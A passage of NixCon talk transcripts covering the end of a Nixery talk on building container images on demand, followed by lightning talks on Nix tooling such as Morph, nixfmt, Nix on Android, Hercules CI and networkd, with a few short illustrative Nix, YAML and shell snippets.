scheme, you have a maximum of one derivation, or one closure, per image layer. And there are many situations in which things belong together — say we have a program called foo, and it depends on foo-data.
There's never really a good reason to split foo and foo-data apart from each other — we actually want to put them in the same layer and make sure we get optimal caching during the builds. So I'm going to walk you quickly through how that works; there's a more detailed write-up for those of you who like graphs. Right. I suspect that some of this is not going to be readable all the way from the back, but I'm going to very quickly talk through it. I had to find something that doesn't have a whole lot of dependencies to actually demo this. My initial attempt was to use git, but git depends on literally the entire universe and every single Perl package that exists — that's a lot of packages. What we have here is a blue node at the top called the image root, and then there are a few arrows that go from that to the top level of this graph, which are the packages that the user requested. Specifically, there's htop, there's nano, and there's a shell somewhere, and that's it for this image — actually, nano is part of the shell alias. If we look at this, there are a few interesting things in here. For example, Perl is only referenced once, by moreutils up there, but Perl itself actually turns out to be a very popular package — there are a lot of things that depend on Perl. So we would like to use this information to make sure that Perl does not end up bundled together with moreutils. Similarly, we can see that glibc is extremely popular — it's got a lot of arrows going into it.
So what I started doing at this point, together with a few people on IRC and also at work, was devising an algorithm for counting the popularity of all packages in Nix packages, by checking how many runtime references there are to any given derivation, and then creating a popularity metric by multiplying that with the size of the closure, so that we get the best cache-hit performance in terms of data transferred and whatnot. The way this works is that the red nodes here have been identified by Nixery as popular packages, and we draw extra edges from the root to those popular packages — which, in the case of Perl, for example, now means that there are two paths going into Perl; that's the red one up here. Then we create what's called a dominator tree of this, which is a re-layouting of the graph into a tree in which every node is preceded by the ones that all paths to it must pass through. If that was confusing, the Wikipedia article will explain it to you. That ends up looking like this, and suddenly we have a very ordered graph of how these things look. We have the image root, and then a top layer which actually matches very well with the image layers we would like to create. And then stuff like moreutils, which depends on some of these Perl libraries that are not very popular — relatively speaking, within the rest of the ecosystem — and we can bundle those together into the same layer. Once we get to this point, we can calculate the ideal layer layout, which looks like this, and then, based on the budget we have available for layers, we can start merging the least popular things together. And then we actually get pretty good build caching out of it. Cool. Does this make sense so far? Would anybody like to inject a question at this point? Right, let's move on. So, what about image tags? One component of image names I didn't mention before is this yellow one here at the end.
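The popularity metric described above can be sketched very loosely in Nix — the field names and numbers here are invented for illustration; the real implementation walks the runtime-reference graph of the store:

```nix
let
  # popularity ≈ number of runtime references × closure size
  score = pkg: pkg.referenceCount * pkg.closureSize;

  packages = [
    { name = "glibc";     referenceCount = 40; closureSize = 30; }
    { name = "perl";      referenceCount = 12; closureSize = 60; }
    { name = "moreutils"; referenceCount = 1;  closureSize = 5;  }
  ];
in
  # sort descending by score to pick layer candidates from the top
  builtins.sort (a: b: score a > score b) packages
```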
It's the image tag. For Docker, these are commonly the versions that people add to things — they'll have something like ubuntu, a colon, and then an Ubuntu release version or whatever. But I realized that we can actually use this information and map it onto something else, specifically git commits. So if you're pointing Nixery at the public nixpkgs repository, you can use this to get arbitrary references, like specific channels or specific commits. If you're pointing it at a private repository, you can have your CI substitute these parameters, and then you can use this as your deployment strategy. To quickly show that, I'll give you a demo involving Kubernetes — and this is going to be the one that will definitely fail. Wish me luck. All right. What I basically want to show, first of all, is the deployment manifest for my blog. My blog, which most of you haven't read, and which I don't really post to — whatever; it's an interesting experimental playground for new technology. I have this Kubernetes manifest that deploys the blog. For those of you not familiar with Kubernetes: most of the fields in here don't really matter; it's just a kind of verbose thing. The primary line in here is this one. It specifies the image to run — I'm going to zoom in a little bit, just to make sure that people can see this — and what's basically going on is that I'm pulling an image from nixery.local, which is a private DNS name pointing to a Nixery instance running inside of my cluster. How to do this is something I'm currently writing documentation for, so people will be able to start doing it on their own very soon. And then I want the attribute tazjin.blog, which is the derivation for my blog, and I specify the version as the git HEAD. This syntax here is from a templating tool that I use, called kontemplate, which basically just inserts the current git commit of the repository that you're in. Right.
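Under such a scheme, an image tag resolving to a git commit is conceptually similar to pinning a source in Nix — this is only an illustrative analogy, not Nixery's actual internals, and the revision is a placeholder:

```nix
# a tag on the image name can be treated as a git revision at which
# to evaluate the package set — conceptually like:
builtins.fetchGit {
  url = "https://github.com/NixOS/nixpkgs.git";  # or a private repo
  rev = "<commit-from-image-tag>";               # placeholder revision
}
```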
So what I can show you at this point is that I can describe the deployment for my blog in Kubernetes. I'm live, speaking to the Kubernetes cluster in which I deploy my personal things. And we can see that the image is currently some commit in this Git repository. I can take this commit and look at what it is exactly, and I know that this is the one from which this particular image was built. So, to do something a little interactive now: I have spun up Nixery inside of the cluster. Here's the live log stream from Nixery. And I'm going to, first of all, run a container inside of Kubernetes and attach to it interactively, and then we will do something more interesting. So the way this works here is syntactically very similar to Docker. So if you saw the previous command and understood it, it's pretty much the same thing: we're running a container, we're attaching a TTY, we're doing this interactively, we're giving it some randomly generated name because we don't want conflicts, we're not restarting it, and we're pulling the image from nixery.local/shell. So it's just going to give me the standard bash environment. If I run this down here, I will see that a demo container is now creating, and after a couple of seconds I get a shell out of it. Cool. So there's nothing extra in here, as before; there are no extra commands. I'm not going to demo htop again. Instead, I'm just going to let you know that this Nixery instance is pointing at the repository I was showing you earlier. So I can actually go and pull the NixCon demo that I was showing earlier into this instance and deploy a container with it. I'm just going to go ahead and do that instead of talking too much about it. And now we should start seeing messages from Nixery here. So let me just make sure that this stream is not dead. Yeah, here we go. So there's now a build happening, and if Domen is doing his job well and Cachix is up and running, then this should hit the binary cache.
If it doesn't, it's going to be interesting, because this is a Rust thing and the Rust compiler is not the fastest one, and then I'm probably going to end up in a situation like yesterday with the Haskell demo. So let's give it a moment and see what happens. Actually, on the topic of caches: in this case, what I found to be a very effective way of working with this is having a CI set up on your system that populates the binary cache, something like Cachix, on every push, so that all the things are already pre-built when Nixery tries to go and fetch them from a binary cache. Nixery can in theory go and start building everything from scratch, but you probably don't want it to be spending a couple of hours building your Haskell services. So it's nice to have that done already when you get to the point of deployment. What we're interested in here is not necessarily having everything pre-cached on an image level, because we want to be able to dynamically modify what goes into an image, for example by adding debugging tools, but it's still nice to have offloaded the caching of stuff like your actual service builds to Nix. Okay, here we go. The Nix build is done, a bunch of stuff happened under the hood, and now we have a command prompt here that should actually give me the NixCon demo. And now if I forward... Let's see if we can get this to work. This is the one. If we forward something like port 4242 into this container, then I should be able to... Right, that demo worked. I'm surprised. The trivial first one, that's how it always goes. Cool. So Kubernetes is pretty much one of the ideal ways of using this in production, and it's kind of the origin of the idea, where this whole thing came from. And the deployment of Nixery into a cluster is relatively simple. Like I was saying, this is going to be documented on my page. You basically just run a Nixery instance and add some environment variables to configure it. There's nothing really special about it.
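To give a feel for what "just run an instance and set some environment variables" might look like, here is a hedged sketch of a container spec. The variable names below are illustrative assumptions rather than Nixery's confirmed configuration surface; check the Nixery documentation for the real names:

```yaml
# hedged sketch: running Nixery in a cluster, configured via env vars
# (variable names are illustrative assumptions)
containers:
  - name: nixery
    image: nixery-service-image
    env:
      - name: NIXERY_PKGS_REPO        # which package set to build images from
        value: "https://github.com/NixOS/nixpkgs"
      - name: GCS_BUCKET              # where built image layers are stored
        value: "my-nixery-layers"
```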
The one restriction that is in place at the moment, simply because I don't have time to implement support for everything, is that this only runs on Google Cloud Platform right now. There is a mode coming up for just being able to use a local file system instead of serving image layers from a storage system, and once that happens, you can actually run this anywhere. Also, contributions welcome if somebody wants to implement that; the issue tracker describes how it should work. And once you have that up and running, you can create these kinds of things to simplify the deployment infrastructure using this service. Right, that's kind of the primary thing I wanted to say. Here are my contact details and where to find the source code and all that kind of thing. Yes. And I want to say thanks to Sarah and Ida for coming up with the broccoli alias, which we picked up late yesterday evening. Right, questions. So, two questions. First, in the URL, you specify the path and you specify packages or the versions using slashes. Yep. Did you try, or did you consider, using Nix expressions there? Yes. The primary issue is that there are restrictions in the Docker registry protocol on which characters are allowed, and it's quite restrictive. So for example, an interesting fact, there's an issue on the issue tracker about this: you cannot have uppercase characters in there. And nixpkgs has things like haskellPackages, which has an uppercase character, but you might want to refer to packages inside of that that actually contain binaries. So what I did is I try a first lookup with the exact name that the user specified, and if that doesn't work, I normalize the casing of all attributes and then do a lookup with that. And some of you are probably guessing this right now: yes, there are name clashes based on casing inside of nixpkgs.
Fortunately, at the top level, this only affects things that are actually aliases for each other, but inside of haskellPackages there are actually different pieces of software with names that only differ in casing. For those, I just don't have a solution at the moment. If you need one of those, I don't know, make a private wrapper with aliases, something sane. With the original Kubernetes controller idea, I also considered adding a field to just straight-up add a Nix expression in there, but since that idea has kind of been dropped, I thought that it's probably more reasonable to actually keep those in the Nix repository rather than inside of the deployment manifest. Okay, thank you. And the second question would be, how do you set up a private Git repository with it? Specifically, I'm interested in the keys. So I'm using the builtins.fetchGit functionality to fetch the repo, and builtins.fetchGit uses the SSH configuration of your environment. So it's impure, which means that as long as the environment in which Nixery is running is configured with appropriate SSH credentials, then everything will just kind of work. Thank you. Cheers. All right, anything else? Yes, I've missed that bit, but I wonder, a Dockerfile has a lot more to express, like mount points, EXPOSE, whatever. Is that handled with Nixery, or do you have to build some kind of command line around that? So at the moment, most of those things, because they're kind of only metadata, are outsourced to Kubernetes, so you specify stuff like the entrypoint inside of the deployment manifest. There is an effort in progress in nixpkgs right now to add metadata to every derivation that contains binaries that tells us what the primary binary in this package is. And once that is in place, we can actually automatically generate entrypoints. But then there's also the question: if somebody writes shell/nginx/ngrok, which one do they actually want to run?
So at some point, you still have to defer to the user. As for environment variables and that kind of thing, in theory the Nix builder that we use to do this kind of stuff supports them, but there is currently no surface in the API where you can actually attach that. We might come up with something later. There are a few issues about related things on the tracker; feel free to give some input. Other examples of meta-packages besides shell? And what can you do with those meta-packages? So shell is the only one that the public instance supports at the moment. The next one that I'm currently working on is arm64, to serve you arm64 binaries. The thing with that is that the Docker registry protocol has sort-of support for switching architectures, but it does it in the form of serving you one manifest that contains hashes for all architectures. So if you were to use that functionality, you would have to build all things for all architectures on every request, which is probably not what the user wants. So I'm thinking that meta-packages as the first element are a more sane way of toggling that behavior. All right. Thank you very much. Thank you.
Nixery builds container images on-demand via Nix and serves them via the standard Docker registry protocol. In this talk we look at how it works, which implementation challenges came up and how it is useful in the so-called "real world".
10.5446/50701 (DOI)
Let's get rolling. We have about five of them, I think. The first one is Tomas with his nix-cluster. Hello again. So I deploy a lot of servers in one of the companies I'm helping. We have around 1,000 hosts, which is relatively fine. And I use different kinds of tools: I use NixOps, I use Terraform, CloudFormation, whatever crap is on Azure, and all those Google services. And they have some issues. So the big gray box is just a tool, right? And it has fixed logic for quite a few components. One of them is fine. And for me, especially the rollout or deploy strategy, which is hardcoded into those tools, is really, really crap. I have a lot of environments which are completely different, right? So first of all, they have hardcoded abstractions; I cannot create my own abstractions. Or maybe NixOps is a little easier, but still. The deployment strategy is fixed. Sometimes it's parametrized, you can do parallel or sequential, but can you inject your check for the database? Like, you want to roll out your database, you have 40 servers of Cassandra, and you want to do it one node at a time, and it takes like two days. Those tools are really not good for that. And they are really buggy. Anybody use Terraform? Like, hell, right? So there are a few more. Sometimes you want to extend your tool, and it's not always easy. The state file is another idea; this concept should really die. And there are more bugs everywhere. So the idea would be to shift this tool into a library. So now the big gray box is our own tool. So basically, we use the pieces from other libraries to build our own stuff. Of course, that makes it a little harder, because a lot of glue and error handling is now on our side. But that's not that bad. We can minimize it, and we can try to figure out how we can minimize that and make it better. So what does that give us if we switch from the framework to the library approach, right? We can integrate new abstractions faster.
We can describe whatever we want in the language we want. We can put in our own rollout strategy. We can not use a state file. And we can integrate other clouds or cloud resources much faster than the tools can. With a tool, getting a pull request through with proper testing takes at least a few weeks or months, and then you have to fork it or something, right? So if we have different kinds of deployments, like Cassandra or Elasticsearch, sometimes you want to restart all cluster nodes at once, sometimes you want to deploy sequentially, sometimes you want to have a health check between deploying services, sometimes you want to just build an AMI and change a CloudFormation parameter just to update the auto-scaling set, and you really don't care about deploying through SSH itself. There are different methods, and those tools are not supporting them at all. So if we use those libraries, then we have a lot of glue on our side for the error handling and logic. So how can we make it a lot more efficient? So the error side is a little simpler. As you see, in both cases the user test coverage is the same, right? We have a little less coverage for testing the tool, but the user coverage is the same, which is basically: I have the input, and what is the output? Is the rollout done completely well? So the error handling is fine; we write our test cases for that. And if we want to switch away from that tool, it is already done. So how do we minimize the glue and the logic? So I wrote these two libraries. They are really crap, but I will be developing them for another few weeks, so hopefully they will be usable. So the idea is to develop bash tools really, really fast. There are a few libraries like that already, so you can probably use those if you prefer; I am demonstrating the concept only. So it is similar to Git, right? You have a whatever-ctl or admin tool. You have subcommands. This is the main application.
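The git-style subcommand pattern being described can be sketched in plain bash like this. The function and command names are made up for illustration; they are not from the speaker's actual libraries:

```shell
# hypothetical sketch of a git-style subcommand dispatcher in bash
tool() {
  local cmd=$1; shift
  case "$cmd" in
    create) echo "creating node $1" ;;   # a real tool would call the cloud CLI here
    deploy) echo "deploying $1" ;;       # a real tool would run the rollout strategy here
    *)      echo "usage: tool {create|deploy} <name>" ;;
  esac
}

tool create db1    # prints: creating node db1
```

Each subcommand body stays a few lines of bash that shells out to the mature vendor CLIs, which is exactly the library-over-framework trade-off the talk argues for.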
You define just a description and a main, and that is it, like all the other stuff. And here you define command number one: you define four options, you define a description, and you run main. And then your logic for your cloud is just one line here. But I will demonstrate it with something more cool. So that was the library for bash to produce CLI interfaces quickly. And now nix-cluster. So this is just a set of functions, mostly bash, like this, where you have specific sets of requirements you want to deliver. So in this case you have Cassandra and Docker, and you have NixOS on VSH. And then you have everything inside, and you can use them, you can develop your own. Those files don't have more than like ten lines of code, so they're reusable. So how do we want to implement stuff, for example? We have our main command, which in this example is the first one, and then we have subcommands later. Okay. So we have some implementation details here. So how do we do that? Okay. So this is probably the most important stuff. We write one command, we have four options, like name, node ID, Nix expression, SSH private key path, and then we source the implementation in the last line. And the implementation is really just a few lines of bash which do the job. So instead of using Terraform or whatever, let's use the AWS CLI, Azure CLI, Google CLI to manage the cloud from local bash. Use the tools that are working, that are mature, that are delivered by the vendors, and don't produce much code; make it as simple as possible, and use libraries instead of frameworks. Thank you. Next up is Lars Jellema with what makes a Nix formatter. I would like to remind lightning talk speakers to please keep track of the timer over there. Don't run over time. Is this one on? All right. So hi, I'm Lars. I'm known on GitHub as Lucus16. I work at Serokell, and Serokell asked me about eight months ago to create a formatter for Nix, as there weren't any good formatters back then. So I went out and did that. That was my task.
And I had to wonder, how do you build a formatter? So I started with just a parser and a pretty-printer. And then I had to wonder, how do you determine the rules for what is pretty? So obviously you first look at the common practices, but there are still multiple styles used; not everybody uses the same style. And there are a few choices you can make. So one is to do very specific conversions: you keep all the formatting that is in the original file, and you fix up specific bits of ugliness that you don't like. And this doesn't change too much, so you have more control. But you also need to spend more manual effort to format the file, because it doesn't cover all cases. So you might still end up with mixed formats from different sources. And what this means is that the output is very consistent when you make edits to your source file, but the output is not as consistent between files from very different repositories. So the other approach is total conversion: you throw away all the formatting that was in the original file, and then you take a top-down approach. You start formatting everything from scratch, which is the approach I've taken for nixfmt. You might have heard about it. So this forces you to implement formatting for everything, and that also means you no longer need to do any manual formatting. So you can just fire and forget it. And the advantage of that is that it's consistent regardless of the input. So if you have files from two very different developers, all the code will look similar. The diffs might get a little larger because of that when you edit files, but there are ways to get around that: you can ignore whitespace with git diff and it won't be as large. And the reason why this is actually doable in Nix is because Nix is a pretty simple language, and so there are few enough cases that you can actually get good formatting for all of them.
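To make "total conversion" concrete, here is a hypothetical before/after for a small Nix attribute set. This is only an illustration of the idea, not nixfmt's exact output:

```nix
# before: whatever formatting the author happened to use
{ foo = 1; bar = { baz = 2; qux = 3; }; deps = [ a b c ]; }
```

```nix
# after: one canonical layout, derived from scratch
{
  foo = 1;
  bar = {
    baz = 2;
    qux = 3;
  };
  deps = [ a b c ];
}
```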
There's also something you have to think about, which is clarity versus prettiness. So it's very tempting to make every piece of code very pretty by aligning all the assignment operators, but that also takes a lot more work, because a computer can't always guess what's pretty for you. But it can understand what is clear. I'll give an example, actually. So for Nix expressions, the pretty-printing library I used originally, which is used mostly in Haskell, does this: it does the one on the left, the bad part. So it really wants to fit as much as possible into a small space, and it will actually split the inner expression, which is just a call, rather than doing what's on the right and splitting on logical parts of the expression. So I prefer that, and that's why I had to change the pretty-printing algorithm from the standard one in Haskell. And actually, what I like the best is this, because the operators and the keywords are on the left and you can more easily scan the code. Yeah, that was pretty much the entire talk. So thank you all for listening, and if you have any questions, please come and see me after the lightning talks. I'd love to talk to you. Thank you. So next up is Yuya Inchatsuki with NixGui: visualizing the Nix scope and store. Hello, Nixers. I want to talk about my project, maybe not even a project yet, but an idea for the hackday, although there is already some amount of working code and a working application. So when I started using Nix and diving deeper into the language, I thought it would be a good idea to write something which would make this task easier for others. And the more ambitious goal is to make something which could be usable as an installer. So because I'm mostly familiar with Python, and Qt has a better multi-platform reputation and is also not hard-bound to a graphical interface, and I hope it is possible to reuse the models for something like ncurses, I have chosen Python with Qt.
So what should the GUI for Nix look like? So I think users would expect some kind of tree visualizing the scope and the attributes, allowing them to read the descriptions and set values. And here is what Nix has. So there is a flow, and there are a few problems with this, because, for example, there is no such thing as a canonical path in the scope, because one thing can be accessed via multiple paths, which is used a lot in the scope and also pollutes the output of nix search a lot. So you can see in the search results, for example, just nixpkgs.vlc and something like nixpkgs.libsForQt5.vlc, and it's the same thing, and when you are new to Nix it makes for quite some confusion. Then there is the result of computation, derivations and output paths in the store, and this transition is, in fact, irreversible. It's a problem, maybe, that we cannot get the state of the scope which produced the current profile. And I have started with the store browser, which can currently be used to choose some profile or an exact store path and see the dependency tree and different information about store paths. And there is also some prototype for the scope browser, which uses nix eval to list attributes and parses the JSON output. I don't yet have a good solution for this, but the idea is maybe we should just ignore... Okay, I will be finishing. If somebody here has strong experience with Qt, it would be nice to have a talk, maybe, to verify that my approach is good enough. Thank you for your attention. Next up is Marek Mahut, and I believe you are going to talk about Morph. Okay, thanks. Hello everyone. My name is Marek Mahut and I am working for a company called SatoshiLabs. You probably know SatoshiLabs as the company behind the first cryptocurrency hardware wallet, called Trezor, and today I am going to show you how we are using Morph for the configuration management of our NixOS instances. Before I jump in, can I just quickly ask how many of you are familiar with Morph?
Can you raise your hands? Okay, so a lot of people, that's good. What is Morph? I really like the project description, which is just "a fancy wrapper around the tools we are already using daily". The features: compared to the standard tooling, it is multi-host, which is probably a given. It's stateless, so compared to other configuration management tools such as NixOps you don't need to store the state of the infrastructure, which is really nice if you are working in a team. It has built-in health checks, so after each deploy you can verify your infrastructure is running as expected, and it has a built-in way to manage your secrets, out of the Nix store of course. You can get it at this GitHub URL, and it's of course in nixpkgs, so you can install it directly. Okay, so this is our directory structure for our Morph configuration. If you are familiar with Puppet, you might be familiar with this as well, as we borrowed some ideas from them. The main file, which is called by Morph, is infra.nix, and in this file we actually just import all of the files which we call profiles. So each server, each instance, has its own profile. In this profile file we store information that is specific to the host itself, things such as IP addresses and host names, but also the hardware configuration, and most importantly, each of the profile files includes a number of roles. With roles, we can have a common role where we define something for all of the hosts, such as our default package set for example, but each of the profiles has a role specific to its function. In this example we have the role "database" that is directly linked to this profile. The roles are actually built from modules, so each role is using some modules, in this example nginx, and we also have a number of secrets. We are using git-crypt to manage our secrets, so they are actually encrypted on the remote Git server, but we can work with them just like plain files. The workflow is really simple.
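The profiles-and-roles layout just described could be sketched roughly like this. All host and file names here are made up for illustration; they are not SatoshiLabs' actual configuration:

```nix
# infra.nix -- hypothetical sketch of the layout described above
# (host and file names are made up for illustration)
{
  network.description = "example infrastructure";

  # one profile per host; each profile imports its roles,
  # and roles are in turn built from modules
  db1  = import ./profiles/db1.nix;   # includes roles/common.nix, roles/database.nix
  web1 = import ./profiles/web1.nix;  # includes roles/common.nix, roles/webserver.nix
}
```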
We just execute morph build to build all the derivations for all our servers. morph push will just copy the closures to the remote servers, and then we just run morph deploy switch, which switches the configuration on all of the instances. An interesting thing here: what it does after the switch is complete is also run the health checks, and in case any of those fails, it executes a rollback, so we don't have much downtime and we know what to fix. And the last command we use most often is to upload the secrets. What this does is just take all the secrets and plainly copy them into place, keeping them out of the Nix store. It restarts any services that may depend on those files, and lastly it runs the health checks again to see if everything is all right. Okay, so that's all. Actually, I have some time left. That's good. So that's all; here are the demo files, and you can catch me during lunch if you want to talk more about Morph. I was really hoping we'd get a full Morph presentation, but sadly the developers did not submit a talk, so maybe next year we will get that. Thank you. So next up is Alexander. I don't know how to pronounce his surname, so I'm not even going to try, but he's going to talk about running Nix on Android. Hello. Hello. For all of you who have found yourselves staring at your Android phones and thinking, okay, I want to try running my familiar Linux stuff there: you don't have to go full Samuel, you don't have to go the Mobile NixOS route. There are other approaches, and other distributions pioneered them way earlier than us. You can also go hardcore: you can embrace Android, not ditch it, and recompile your whole distro with Bionic. That means porting everything to a different libc. I think that's hardcore, but Termux does that. Good luck to them. You can also get root and hammer your Android installation so hard that it will start resembling your distro more than Android. That's also always an option for power users.
And you can go an easier way and just use user-space emulation, and I want to tell you that sometimes the lowest-hanging fruit is the ripest one. I'm going to skip all the details; I will upload this somewhere and you can look it up later if you want to. I wanted to frame it as a story. This spring I wanted a lightweight travel laptop. I didn't like anything that I could buy, but I found a nice Android tablet, and I thought, why not a tablet? I don't need much from my travel device, but there was a lingering question: could it run Nix? I did a quick Google lookup and I didn't find a definitive yes; I found a lot of people with a lot of problems compiling Nix under Android, but I found this comment, and it's pretty inspirational: this would turn toys into semi-computers. I love that one. But if I'm paying for a tablet, I want a tablet. I want to use Android apps. I don't want to wait until GNOME catches up with the user experience. I also love my hardware working. So I wanted Nix to coexist with Android. I had also just read the excellent posts by Matthew Bauer about static linking and cross-compilation, and I was like, wow, I know what I've got to do: I should just cross-compile Nix and statically link it, and it will work on Android. So I was pretty stoked. I bought the tablet, and I remember vividly thinking that it would be super cool if I had a working prototype before NixCon, right? Yeah. And I got it working the same evening. The biggest problem was that I had to understand first that I don't need to do anything. If I have PRoot, I can just rewrite accesses to the Nix store so it looks like it is located in an actual /nix/store. And I also thought, okay, I should now sit down and build a rootfs with everything required to run Nix, and it turns out we have one, and it's called the Nix release tarball. And I downloaded it, I PRooted into that, and it worked. Wow. So this is kind of a testament to Nix's portability: it just works on Android, modulo PRoot limitations.
At first it was a very hacky bash script that did everything with an intermediate distribution called Termux, but then I cut out the middleman: I forked the app so it could run Nix directly, and I started cross-compiling PRoot the right Nix way. Then I kind of thought, okay, it just works for me, and I stopped working on it. And then one day I got a PR that rewrites my project. I mean, some lines survived, but that was the README.md, so it doesn't count. So thanks, Gerschtli, for rewriting everything. It's now properly built with Nix, and all the hacks that I installed on the device he also put under Nix control in his second PR, so users now have an upgrade path that is not "wipe all data and reinstall". That's wonderful. And I also just got it accepted into F-Droid, so it should be in their build queue now. Fingers crossed, so try it from F-Droid next week. For now you can try my APK if you want to. What does that give you? You can install an application; it's a terminal. There's a terminal, you can nix run something, and you are encouraged to install Home Manager. You don't have to compile stuff: Hydra has an aarch64 binary cache, so it will just get downloaded, and you don't need root. You don't need user namespaces, you don't need SELinux permissive, whatever. You do need a 64-bit phone or tablet, because we don't have Nix built for 32-bit ARM, unfortunately; it would be slow, and PRoot isn't exactly helping with that. And there are some restrictions: everything that uses ptrace won't work, because PRoot took that. And remember that you are running stuff as an unprivileged user under another Linux distro, and it's not Fedora or Debian, it's Android, so everything is messed up. So don't try fancy stuff like top or maybe ping; that won't fly. But other tools work just fine. I have my favorite tools there. I've typeset this presentation on my tablet; I compiled it with Pandoc. It works. So, a semi-computer, I think. And all my Android experience is still there. My Wi-Fi works. I really value that.
But I think there's also a bigger question: what do we want to do with that? I think we have a quirky platform under our noses. It's quirky, but it's pretty uniformly quirky, and it's already in our pockets. Maybe it's the next nix-darwin and we just didn't explore it enough. I don't know why we didn't do that. And you're not allowed to ask questions, but I am. So, could we make my project a bit more official? I want a fancy-looking hostname for my files or something. Could I maybe recompile everything? That would require a lot of builders and whatever, but it could get me out of PRoot. And what's the actual end game? And is it worth the effort? I don't know. So please find me, ask me, or better, answer those. Thank you. I've actually built my crazy Emacs config on this stuff and it works just great. But next up is Domen Kožar, and he's going to talk about Hercules CI. Hey everyone. How are you doing? All right. You're still awake. Let's see if this works. So I'm hijacking this talk a bit; I'm sorry, for three topics. Let's see if we can get... Please. All right. This might work. All right. So first of all I want to briefly mention NixOS Weekly. It's like a weekly newsletter that's actually a monthly newsletter that goes out when I have time. But you should either subscribe for news, or there's a link somewhere at the bottom of each post where you can send your blog post or whatever you have done with Nix, so it gets featured there. And I think there are almost 1,000 people right now subscribed to it. So it's pretty wide; I mean, you can get a nice audience, and you can see a bunch of posts there. All right. So getting to my third topic via the second one: I wrote, about a year ago, Cachix, which is a hosted binary cache, easy to use. And I don't know if you heard, but GitHub launched their CI. It's called GitHub Actions. So there is a Cachix action. If you need to start really, really easily with Nix and a CI, basically you copy this file into your repo.
You set your keys for Cachix and you're building with Nix and Cachix in like 30 seconds, which is pretty nice to start a simple toy project. And on to my last topic: we're also building a complete CI replacement for Hydra. So, who is running Hydra? All right. My condolences. I also offer emotional support after NixCon. But besides that, you can also use our CI that we've been building for the last year. So I'm going to quickly show how it works. So you can click here, you can say Hercules CI and add a repo, so you can whitelist which repos are built. So let me just show you: there's just one file in it. It's a bit cryptic, but you can build for Linux and Darwin with this simple expression, and it builds a hello-world derivation. So nothing too fancy. So if we edit now, and it loads, we can start building our project. So let's see where it is. All right. So if I push it now, we should see it evaluate and build. There we go. And there you go. So it displays attributes as they're being evaluated, and now it's going to dispatch this to Linux and Darwin and build them. So yeah, that's a very simple demo of it. The agents themselves need to be hosted by you, on different infrastructures. So we provide support for NixOps, nix-darwin and probably other things. We're aiming to make it as simple as possible to deploy those, with scaling in the future and so on. And if you go to docs.hercules-ci.com, you will see instructions on how to deploy those agents. The service is hosted, so you don't have to maintain it, only the agents. It's free for open source. So if you have some hardware, or even just your laptop: the agents are completely stateless, so you can just run one on your laptop, and when it's online, it will build things. And otherwise, it's a paid service for private repositories. And yeah, we're a bit busy with other things right now; we're rebuilding huge Haskell sets. So yeah, that's it.
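The kind of one-file build expression shown in the demo might look roughly like the sketch below. This is an illustrative guess at the shape only; the real file name, format, and cross-platform mechanism are defined by the Hercules CI documentation:

```nix
# hedged sketch of a minimal one-file CI expression like the one demoed
# (file name and structure are assumptions; see the Hercules CI docs)
let
  pkgs = import <nixpkgs> {};
in {
  # each attribute becomes a build; agents pick them up per platform
  hello = pkgs.hello;
}
```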
If you have some questions about Hercules CI or Cachix or even NixOps, talk to me later. Thanks. Thank you, Domen. Next up is Franz Pletz, and he's going to talk about networkd. So hello. This one is going to be quick. Just a few... like, what's the current state of networkd? I did a talk at last NixCon about switching the default networking backend to networkd, but obviously that hasn't happened yet, and quite a lot of people came up to me at this NixCon to ask about the current state. So I'm going to do a lightning talk to inform you what has happened and what's going to happen. So, what has happened? Not that much, actually, due to a lack of time on my part. What we already did is, for 19.09, we deprecated the use of networking.useDHCP together with networkd. So it's not possible to do DHCP on all interfaces anymore if you use networkd, because that's inherently incompatible with how networkd works. What we also did is modify nixos-generate-config to not enable useDHCP globally by default, but only on a per-interface basis. So useDHCP will only be enabled for the interfaces that were available on your system when you installed NixOS. What's currently on master, which flokli actually did: we also removed the 99-main network unit, which was causing the main part of the trouble for networkd users; most networkd users out there actually disabled that unit. And the reasons why it's not ready yet: it's actually more work, and more questions arose than anticipated when I did my talk. There were also some people who came up to me after the talk who still wanted to keep using scripted networking. And that's a problem, because networkd supports many more features, and if we want to expose them as networking options while people still want to use scripted networking, we have to ensure feature parity, or do a lot of assertions, and that would make the networking module even more complex.
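The per-interface DHCP setup described above can be sketched as a NixOS configuration fragment; the interface name eth0 is just an example, and this mirrors what nixos-generate-config would emit rather than being a quote from the talk:

```nix
# Hypothetical NixOS configuration illustrating the 19.09 situation:
# with networkd enabled, global DHCP is deprecated, so DHCP is
# requested per interface instead.
{
  networking.useNetworkd = true;
  networking.useDHCP = false;                # global DHCP: deprecated with networkd
  networking.interfaces.eth0.useDHCP = true; # enable DHCP only where you need it
}
```

This matches the change to nixos-generate-config: instead of one global switch, DHCP is enabled only for the interfaces that actually existed at install time.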
So the problem is that we have to decide how to move forward. And the thing is, we are going to deprecate some of the options in the networking module anyway if we want to switch to networkd, and this is actually a chance to redesign the networking module as a whole. So what I am planning is to create an RFC for this networking module redesign, because when I was thinking about it, I got even more questions and I wasn't sure how to move forward. And that's something the community has to answer, because I could implement what I think is right, but that's probably not the right way to decide for the project. So what's my plan? I would like to have networkd turnkey-ready for 20.03. That means you can use networkd in 20.03 without any problems; that's the idea. For that we need the RFC and a little bit of that redesign of the networking module. For 20.09, I would like to have the redesign of the networking module in place, which would probably break everyone's network configuration, but yeah, that's just something we have to do at some point. So what's coming up? We have to create that RFC, at least before Christmas. So I would like to do a networkd sprint this year. What I am proposing is to do it in Munich at the Mayflower office, and I've already created a Doodle for that. So if you have time and you want to contribute to discussing possible solutions for a new networking module, I will create a post on Discourse later today with the Doodle link and some of the questions I have for you, and I hope some people can come, or maybe even attend remotely, for that sprint, and we can create the RFC. Thanks a lot. So next up is Robin Gloster. He's going to talk about the NixOS RFC process. But I would like to know: is Matthew Bauer around? No? Okay, thank you. So I'll just quickly talk about the NixOS RFC process.
